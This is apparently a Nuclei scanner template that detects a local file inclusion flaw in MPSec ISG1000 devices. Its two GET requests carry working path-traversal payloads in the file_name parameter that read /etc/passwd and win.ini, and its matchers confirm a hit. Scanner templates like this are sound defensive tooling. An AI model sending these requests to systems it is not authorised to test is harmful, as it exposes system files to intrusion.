id: mpsec-lfi

info:
  name: MPSec ISG1000 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: MPSec ISG1000 is vulnerable to local file inclusion.
  reference:
    - https://twitter.com/sec715/status/1402884871173795842
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: mpsec,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "for 16-bit app support"
          - "root:.*:0:0:"
        part: body
        condition: or

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/plain"
        part: header

# Enhanced by mp on 2022/07/27
